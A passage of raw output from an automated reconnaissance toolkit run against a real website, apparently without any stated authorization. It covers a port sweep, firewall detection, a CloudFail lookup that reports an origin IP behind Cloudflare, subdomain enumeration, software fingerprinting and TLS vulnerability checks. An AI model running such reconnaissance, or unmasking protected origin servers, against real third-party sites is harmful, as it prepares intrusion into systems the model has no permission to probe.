  1701. |_[ + ] Found:: UNIDENTIFIED
  1702.  
  1703. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1704. |_[ + ] [ 98 / 100 ]-[08:00:26] [ - ]
  1705. |_[ + ] Target:: [ https://altright.com/author/kulturalkampf/ ]
  1706. |_[ + ] Exploit::
  1707. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1708. |_[ + ] More details::
  1709. |_[ + ] Found:: UNIDENTIFIED
  1710.  
  1711. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1712. |_[ + ] [ 99 / 100 ]-[08:00:27] [ - ]
  1713. |_[ + ] Target:: [ https://altright.com/author/soren/ ]
  1714. |_[ + ] Exploit::
  1715. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1716. |_[ + ] More details::
  1717. |_[ + ] Found:: UNIDENTIFIED
  1718.  
  1719. [ INFO ] [ Shutting down ]
  1720. [ INFO ] [ End of process INURLBR at [28-09-2017 08:00:27]
  1721. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1722. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-altright.com.txt ]
  1723. |_________________________________________________________________________________________
  1724.  
  1725. \_________________________________________________________________________________________/
  1726.  
  1727. + -- --=[Port 110 closed... skipping.
  1728. + -- --=[Port 111 closed... skipping.
  1729. + -- --=[Port 135 closed... skipping.
  1730. + -- --=[Port 139 closed... skipping.
  1731. + -- --=[Port 161 closed... skipping.
  1732. + -- --=[Port 162 closed... skipping.
  1733. + -- --=[Port 389 closed... skipping.
  1734. + -- --=[Port 443 opened... running tests...
  1735. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  1736.  
  1737. ^ ^
  1738. _ __ _ ____ _ __ _ _ ____
  1739. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1740. | V V // o // _/ | V V // 0 // 0 // _/
  1741. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1742. <
  1743. ...'
  1744.  
  1745. WAFW00F - Web Application Firewall Detection Tool
  1746.  
  1747. By Sandro Gauci && Wendel G. Henrique
  1748.  
  1749. Checking https://altright.com
  1750. The site https://altright.com is behind a CloudFlare
  1751. Number of requests: 1
  1752.  
  1753. + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  1754. ____ _ _ _____ _ _
  1755. / ___| | ___ _ _ __| | ___|_ _(_) |
  1756. | | | |/ _ \| | | |/ _` | |_ / _` | | |
  1757. | |___| | (_) | |_| | (_| | _| (_| | | |
  1758. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
  1759. v1.0.1 by m0rtem
  1760.  
  1761.  
  1762. [08:00:31] Initializing CloudFail - the date is: 28/09/2017
  1763. [08:00:31] Fetching initial information from: altright.com...
  1764. [08:00:31] Server IP: 104.27.179.91
  1765. [08:00:31] Testing if altright.com is on the Cloudflare network...
  1766. [08:00:31] altright.com is part of the Cloudflare network!
  1767. [08:00:31] Testing for misconfigured DNS using dnsdumpster...
  1768. [08:00:33] [FOUND:HOST] altright.com cloudflare-nginx 104.27.178.91 AS13335 Cloudflare Inc
  1769. [08:00:33] [FOUND:HOST] www.altright.com cloudflare-nginx 104.27.178.91 AS13335 Cloudflare Inc
  1770. [08:00:33] [FOUND:HOST] www.altright.com cloudflare-nginx 104.27.179.91 AS13335 Cloudflare Inc
  1771. [08:00:33] [FOUND:HOST] altright.com Apache 50.62.56.213 AS26496 GoDaddy.com, LLC United States
  1772. [08:00:33] [FOUND:DNS] elaine.ns.cloudflare.com. 173.245.58.152 AS13335 Cloudflare Inc United States
  1773. [08:00:33] [FOUND:DNS] marek.ns.cloudflare.com. 173.245.59.202 AS13335 Cloudflare Inc United States
  1774. [08:00:33] [FOUND:MX] 50.62.56.213 AS26496 GoDaddy.com, LLC 0 dc-c0dd11b34a77.altright.com.
  1775. [08:00:33] Scanning crimeflare database...
  1776. [08:00:34] [FOUND:IP] 50.62.56.213
  1777. [08:00:34] Scanning 2897 subdomains (subdomains.txt), please wait...
  1778. [08:00:56] [FOUND:SUBDOMAIN] autodiscover.altright.com IP: 40.97.158.120 HTTP: 200
  1779. [08:01:57] [FOUND:SUBDOMAIN] email.altright.com IP: 72.167.218.45 HTTP: 200
  1780. [08:02:09] [FOUND:SUBDOMAIN] ftp.altright.com IP: 50.62.56.213 HTTP: 200
  1781. [08:02:51] [FOUND:SUBDOMAIN] mail.altright.com ON CLOUDFLARE NETWORK!
  1782. [08:04:33] [FOUND:SUBDOMAIN] static.altright.com ON CLOUDFLARE NETWORK!
  1783. [08:05:14] [FOUND:SUBDOMAIN] www.altright.com ON CLOUDFLARE NETWORK!
  1784. [08:05:27] Scanning finished...
  1785. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  1786. https://altright.com [200 OK] CloudFlare, Cookies[__cfduid,wfvt_2729720346], Country[UNITED STATES][US], Google-Analytics[Universal][UA-90381947-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid,wfvt_2729720346], IP[104.27.179.91], MetaGenerator[WordPress 4.8.2], Open-Graph-Protocol[website], PHP[5.6.31], Script[application/javascript,text/javascript], Title[AltRight.com], UncommonHeaders[link,cf-ray], WordPress[4.8.2], X-Powered-By[PHP/5.6.31]
  1787.  
  1788. + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  1789.  
  1790.  
  1791.  
  1792. AVAILABLE PLUGINS
  1793. -----------------
  1794.  
  1795. PluginSessionResumption
  1796. PluginOpenSSLCipherSuites
  1797. PluginCertInfo
  1798. PluginHSTS
  1799. PluginHeartbleed
  1800. PluginCompression
  1801. PluginChromeSha1Deprecation
  1802. PluginSessionRenegotiation
  1803.  
  1804.  
  1805.  
  1806. CHECKING HOST(S) AVAILABILITY
  1807. -----------------------------
  1808.  
  1809. altright.com:443 => 2400:cb00:2048:1::681b:b35b:443
  1810.  
  1811.  
  1812.  
  1813. SCAN RESULTS FOR ALTRIGHT.COM:443 - 2400:CB00:2048:1::681B:B35B:443
  1814. -------------------------------------------------------------------
  1815.  
  1816. * Deflate Compression:
  1817. OK - Compression disabled
  1818.  
  1819. * Session Renegotiation:
  1820. Client-initiated Renegotiations: OK - Rejected
  1821. Secure Renegotiation: OK - Supported
  1822.  
  1823. * Certificate - Content:
  1824. SHA1 Fingerprint: 3af38101a73a8494677d499017a4e3efdd1904b5
  1825. Common Name: sni190556.cloudflaressl.com
  1826. Issuer: COMODO ECC Domain Validation Secure Server CA 2
  1827. Serial Number: 6DBD6BD78F91E08014D6D046DB20B529
  1828. Not Before: Aug 12 00:00:00 2017 GMT
  1829. Not After: Feb 18 23:59:59 2018 GMT
  1830. Signature Algorithm: ecdsa-with-SHA256
  1831. Public Key Algorithm: id-ecPublicKey
  1832. Key Size: 256 bit
  1833. X509v3 Subject Alternative Name: {'DNS': ['sni190556.cloudflaressl.com', '*.444ttg.com', '*.66ddl.com', '*.6yyl.com', '*.altright.com', '*.arktos.com', '*.biseznamka.com', '*.deitti-sivut.com', '*.dsfredmdtom.cf', '*.eggendk.cf', '*.embroiddesigns.net', '*.foragerproject.com', '*.huntingdonmcdonalds.com', '*.jomsey.altervista.org', '*.joyeati.cf', '*.lewfi.stream', '*.minnehaha-kendo.org', '*.minnehahakendodojo.org', '*.mujeresbolivia.com', '*.punkchat.co.za', '*.smart-eas.ru', '*.spankingchat.ca', '*.teacoal.xyz', '444ttg.com', '66ddl.com', '6yyl.com', 'altright.com', 'arktos.com', 'biseznamka.com', 'deitti-sivut.com', 'dsfredmdtom.cf', 'eggendk.cf', 'embroiddesigns.net', 'foragerproject.com', 'huntingdonmcdonalds.com', 'jomsey.altervista.org', 'joyeati.cf', 'lewfi.stream', 'minnehaha-kendo.org', 'minnehahakendodojo.org', 'mujeresbolivia.com', 'punkchat.co.za', 'smart-eas.ru', 'spankingchat.ca', 'teacoal.xyz']}
  1834.  
  1835. * Certificate - Trust:
  1836. Hostname Validation: OK - Subject Alternative Name matches
  1837. Google CA Store (09/2015): OK - Certificate is trusted
  1838. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1839. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1840. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1841. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1842. Certificate Chain Received: ['sni190556.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
  1843.  
  1844. * Certificate - OCSP Stapling:
  1845. OCSP Response Status: successful
  1846. Validation w/ Mozilla's CA Store: OK - Response is trusted
  1847. Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
  1848. Cert Status: good
  1849. Cert Serial Number: 6DBD6BD78F91E08014D6D046DB20B529
  1850. This Update: Sep 24 23:54:56 2017 GMT
  1851. Next Update: Oct 1 23:54:56 2017 GMT
  1852.  
  1853. * Session Resumption:
  1854. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1855. With TLS Session Tickets: OK - Supported
  1856.  
  1857. * SSLV2 Cipher Suites:
  1858. Server rejected all cipher suites.
  1859.  
  1860. * SSLV3 Cipher Suites:
  1861. Server rejected all cipher suites.
  1862.  
  1863.  
  1864.  
  1865. SCAN COMPLETED IN 0.62 S
  1866. ------------------------
  1867. Version: 1.11.10-static
  1868. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1869.  
  1870. Testing SSL server altright.com on port 443 using SNI name altright.com
  1871.  
  1872. TLS Fallback SCSV:
  1873. Server does not support TLS Fallback SCSV
  1874.  
  1875. TLS renegotiation:
  1876. Secure session renegotiation supported
  1877.  
  1878. TLS Compression:
  1879. Compression disabled
  1880.  
  1881. Heartbleed:
  1882. TLS 1.2 not vulnerable to heartbleed
  1883. TLS 1.1 not vulnerable to heartbleed
  1884. TLS 1.0 not vulnerable to heartbleed
  1885.  
  1886. Supported Server Cipher(s):
  1887. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  1888. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1889. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  1890. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
  1891. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1892. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  1893. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
  1894. Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  1895. Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  1896. Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  1897. Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  1898.  
  1899. SSL Certificate:
  1900. Signature Algorithm: ecdsa-with-SHA256
  1901. Subject: sni190556.cloudflaressl.com
  1902. Altnames: DNS:sni190556.cloudflaressl.com, DNS:*.444ttg.com, DNS:*.66ddl.com, DNS:*.6yyl.com, DNS:*.altright.com, DNS:*.arktos.com, DNS:*.biseznamka.com, DNS:*.deitti-sivut.com, DNS:*.dsfredmdtom.cf, DNS:*.eggendk.cf, DNS:*.embroiddesigns.net, DNS:*.foragerproject.com, DNS:*.huntingdonmcdonalds.com, DNS:*.jomsey.altervista.org, DNS:*.joyeati.cf, DNS:*.lewfi.stream, DNS:*.minnehaha-kendo.org, DNS:*.minnehahakendodojo.org, DNS:*.mujeresbolivia.com, DNS:*.punkchat.co.za, DNS:*.smart-eas.ru, DNS:*.spankingchat.ca, DNS:*.teacoal.xyz, DNS:444ttg.com, DNS:66ddl.com, DNS:6yyl.com, DNS:altright.com, DNS:arktos.com, DNS:biseznamka.com, DNS:deitti-sivut.com, DNS:dsfredmdtom.cf, DNS:eggendk.cf, DNS:embroiddesigns.net, DNS:foragerproject.com, DNS:huntingdonmcdonalds.com, DNS:jomsey.altervista.org, DNS:joyeati.cf, DNS:lewfi.stream, DNS:minnehaha-kendo.org, DNS:minnehahakendodojo.org, DNS:mujeresbolivia.com, DNS:punkchat.co.za, DNS:smart-eas.ru, DNS:spankingchat.ca, DNS:teacoal.xyz
  1903. Issuer: COMODO ECC Domain Validation Secure Server CA 2
  1904.  
  1905. Not valid before: Aug 12 00:00:00 2017 GMT
  1906. Not valid after: Feb 18 23:59:59 2018 GMT
  1907.  
  1908. ######################################################################################################################################
  1909. testssl 2.9dev from https://testssl.sh/dev/
  1910.  
  1911. This program is free software. Distribution and
  1912. modification under GPLv2 permitted.
  1913. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  1914.  
  1915. Please file bugs @ https://testssl.sh/bugs/
  1916.  
  1917. ######################################################################################################################################
  1918.  
  1919. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  1920. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  1921. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  1922.  
  1923.  
  1924. Testing all IPv4 addresses (port 443): 104.27.179.91 104.27.178.91
  1925. -----------------------------------------------------
  1926. Start 2017-09-28 08:05:35 -->> 104.27.179.91:443 (altright.com) <<--
  1927.  
  1928. further IP addresses: 104.27.178.91 2400:cb00:2048:1::681b:b35b
  1929. 2400:cb00:2048:1::681b:b25b
  1930. rDNS (104.27.179.91): --
  1931. Service detected: HTTP
  1932.  
  1933.  
  1934. Testing protocols via sockets except SPDY+HTTP2
  1935.  
  1936. SSLv2 not offered (OK)
  1937. SSLv3 not offered (OK)
  1938. TLS 1 offered
  1939. TLS 1.1 offered
  1940. TLS 1.2 offered (OK)
  1941. SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
  1942. HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  1943.  
  1944. Testing ~standard cipher categories
  1945.  
  1946. NULL ciphers (no encryption) not offered (OK)
  1947. Anonymous NULL Ciphers (no authentication) not offered (OK)
  1948. Export ciphers (w/o ADH+NULL) not offered (OK)
  1949. LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  1950. Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  1951. Triple DES Ciphers (Medium) not offered (OK)
  1952. High encryption (AES+Camellia, no AEAD) offered (OK)
  1953. Strong encryption (AEAD ciphers) offered (OK)
  1954.  
  1955.  
  1956. Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
  1957.  
  1958. PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  1959. ECDHE-ECDSA-AES256-GCM-SHA384
  1960. ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
  1961. ECDHE-ECDSA-CHACHA20-POLY1305
  1962. ECDHE-ECDSA-AES128-GCM-SHA256
  1963. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
  1964. Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
  1965.  
  1966.  
  1967. Testing server preferences
  1968.  
  1969. Has server cipher order? yes (OK)
  1970. Negotiated protocol TLSv1.2
  1971. Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  1972. Cipher order
  1973. TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  1974. TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  1975. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  1976. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  1977. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  1978. ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  1979.  
  1980.  
  1981. Testing server defaults (Server Hello)
  1982.  
  1983. TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  1984. "session ticket/#35" "status request/#5"
  1985. "next protocol/#13172" "EC point formats/#11"
  1986. "extended master secret/#23"
  1987. "signed certificate timestamps/#18"
  1988. "application layer protocol negotiation/#16"
  1989. Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  1990. SSL Session ID support yes
  1991. Session Resumption Tickets: yes, ID: yes
  1992. TLS clock skew -1 sec from localtime
  1993. Signature Algorithm ECDSA with SHA256
  1994. Server key size ECDSA 256 bits
  1995. Fingerprint / Serial SHA1 3AF38101A73A8494677D499017A4E3EFDD1904B5 / 6DBD6BD78F91E08014D6D046DB20B529
  1996. SHA256 2BE0A7BAE715E0B69AF50EE7881BEE311C24D4CDC7DFAF888B69F3D0FA69D902
  1997. Common Name (CN) sni190556.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
  1998. subjectAltName (SAN) sni190556.cloudflaressl.com *.444ttg.com
  1999. *.66ddl.com *.6yyl.com *.altright.com
  2000. *.arktos.com *.biseznamka.com *.deitti-sivut.com
  2001. *.dsfredmdtom.cf *.eggendk.cf
  2002. *.embroiddesigns.net *.foragerproject.com
  2003. *.huntingdonmcdonalds.com *.jomsey.altervista.org
  2004. *.joyeati.cf *.lewfi.stream *.minnehaha-kendo.org
  2005. *.minnehahakendodojo.org *.mujeresbolivia.com
  2006. *.punkchat.co.za *.smart-eas.ru *.spankingchat.ca
  2007. *.teacoal.xyz 444ttg.com 66ddl.com 6yyl.com
  2008. altright.com arktos.com biseznamka.com
  2009. deitti-sivut.com dsfredmdtom.cf eggendk.cf
  2010. embroiddesigns.net foragerproject.com
  2011. huntingdonmcdonalds.com jomsey.altervista.org
  2012. joyeati.cf lewfi.stream minnehaha-kendo.org
  2013. minnehahakendodojo.org mujeresbolivia.com
  2014. punkchat.co.za smart-eas.ru spankingchat.ca
  2015. teacoal.xyz
  2016. Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2017. Trust (hostname) Ok via SAN (SNI mandatory)
  2018. Chain of trust Ok
  2019. EV cert (experimental) no
  2020. Certificate Expiration 143 >= 60 days (2017-08-11 20:00 --> 2018-02-18 18:59 -0500)
  2021. # of certificates provided 3
  2022. Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  2023. OCSP URI http://ocsp.comodoca4.com
  2024. OCSP stapling offered
  2025. OCSP must staple no
  2026. DNS CAA RR (experimental) --
  2027. Certificate Transparency yes (TLS extension)
  2028.  
  2029.  
  2030. Testing HTTP header response @ "/"
  2031.  
  2032. HTTP Status Code 200 OK
  2033. HTTP clock skew +2 (± 1.5) sec from localtime
  2034. Strict Transport Security --
  2035. Public Key Pinning --
  2036. Server banner cloudflare-nginx
  2037. Application banner X-Powered-By: PHP/5.6.31
  2038. Cookie(s) 2 issued: 2/2 secure, 2/2 HttpOnly
  2039. Security headers --
  2040. Reverse Proxy banner --
  2041.  
  2042.  
  2043. Testing vulnerabilities
  2044.  
  2045. Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  2046. CCS (CVE-2014-0224) not vulnerable (OK)
  2047. Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
  2048. Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  2049. Secure Client-Initiated Renegotiation not vulnerable (OK)
  2050. CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  2051. BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
  2052. Can be ignored for static pages or if no secrets in the page
  2053. POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  2054. TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  2055. SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  2056. FREAK (CVE-2015-0204) not vulnerable (OK)
  2057. DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  2058. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  2059. LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  2060. BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA
  2061. ECDHE-ECDSA-AES256-SHA
  2062. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  2063. LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  2064. RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  2065.  
  2066.  
  2067. Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
  2068.  
  2069. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  2070. -----------------------------------------------------------------------------------------------------------------------------
  2071. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2072. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
  2073. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
  2074. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
  2075. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
  2076. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
  2077. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
  2078. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
  2079.  
  2080.  
  2081. Running client simulations via sockets
  2082.  
  2083. Android 2.3.7 No connection
  2084. Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2085. Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2086. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2087. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2088. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2089. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  2090. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  2091. Chrome 57 Win 7 No connection
  2092. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2093. Firefox 53 Win 7 No connection
  2094. IE 6 XP No connection
  2095. IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2096. IE 8 XP No connection
  2097. IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2098. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2099. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2100. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2101. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2102. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2103. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2104. Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2105. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2106. Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2107. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2108. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2109. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2110. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2111. Java 6u45 No connection
  2112. Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2113. Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2114. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2115. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2116.  
  2117. Done 2017-09-28 08:09:15 [ 222s] -->> 104.27.179.91:443 (altright.com) <<--
  2118.  
  2119. -----------------------------------------------------
  2120. Start 2017-09-28 08:09:15 -->> 104.27.178.91:443 (altright.com) <<--
  2121.  
  2122. further IP addresses: 104.27.179.91 2400:cb00:2048:1::681b:b35b
  2123. 2400:cb00:2048:1::681b:b25b
  2124. rDNS (104.27.178.91): --
  2125. Service detected: HTTP
  2126.  
  2127.  
  2128. Testing protocols via sockets except SPDY+HTTP2
  2129.  
  2130. SSLv2 not offered (OK)
  2131. SSLv3 not offered (OK)
  2132. TLS 1 offered
  2133. TLS 1.1 offered
  2134. TLS 1.2 offered (OK)
  2135. SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
  2136. HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  2137.  
  2138. Testing ~standard cipher categories
  2139.  
  2140. NULL ciphers (no encryption) not offered (OK)
  2141. Anonymous NULL Ciphers (no authentication) not offered (OK)
  2142. Export ciphers (w/o ADH+NULL) not offered (OK)
  2143. LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  2144. Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  2145. Triple DES Ciphers (Medium) not offered (OK)
  2146. High encryption (AES+Camellia, no AEAD) offered (OK)
  2147. Strong encryption (AEAD ciphers) offered (OK)
  2148.  
  2149.  
  2150. Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
  2151.  
  2152. PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  2153. ECDHE-ECDSA-AES256-GCM-SHA384
  2154. ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
  2155. ECDHE-ECDSA-CHACHA20-POLY1305
  2156. ECDHE-ECDSA-AES128-GCM-SHA256
  2157. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
  2158. Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
  2159.  
  2160.  
  2161. Testing server preferences
  2162.  
  2163. Has server cipher order? yes (OK)
  2164. Negotiated protocol TLSv1.2
  2165. Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2166. Cipher order
  2167. TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  2168. TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  2169. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  2170. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  2171. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  2172. ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  2173.  
  2174.  
  2175. Testing server defaults (Server Hello)
  2176.  
  2177. TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  2178. "session ticket/#35" "status request/#5"
  2179. "next protocol/#13172" "EC point formats/#11"
  2180. "extended master secret/#23"
  2181. "signed certificate timestamps/#18"
  2182. "application layer protocol negotiation/#16"
  2183. Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  2184. SSL Session ID support yes
  2185. Session Resumption Tickets: yes, ID: yes
  2186. TLS clock skew -1 sec from localtime
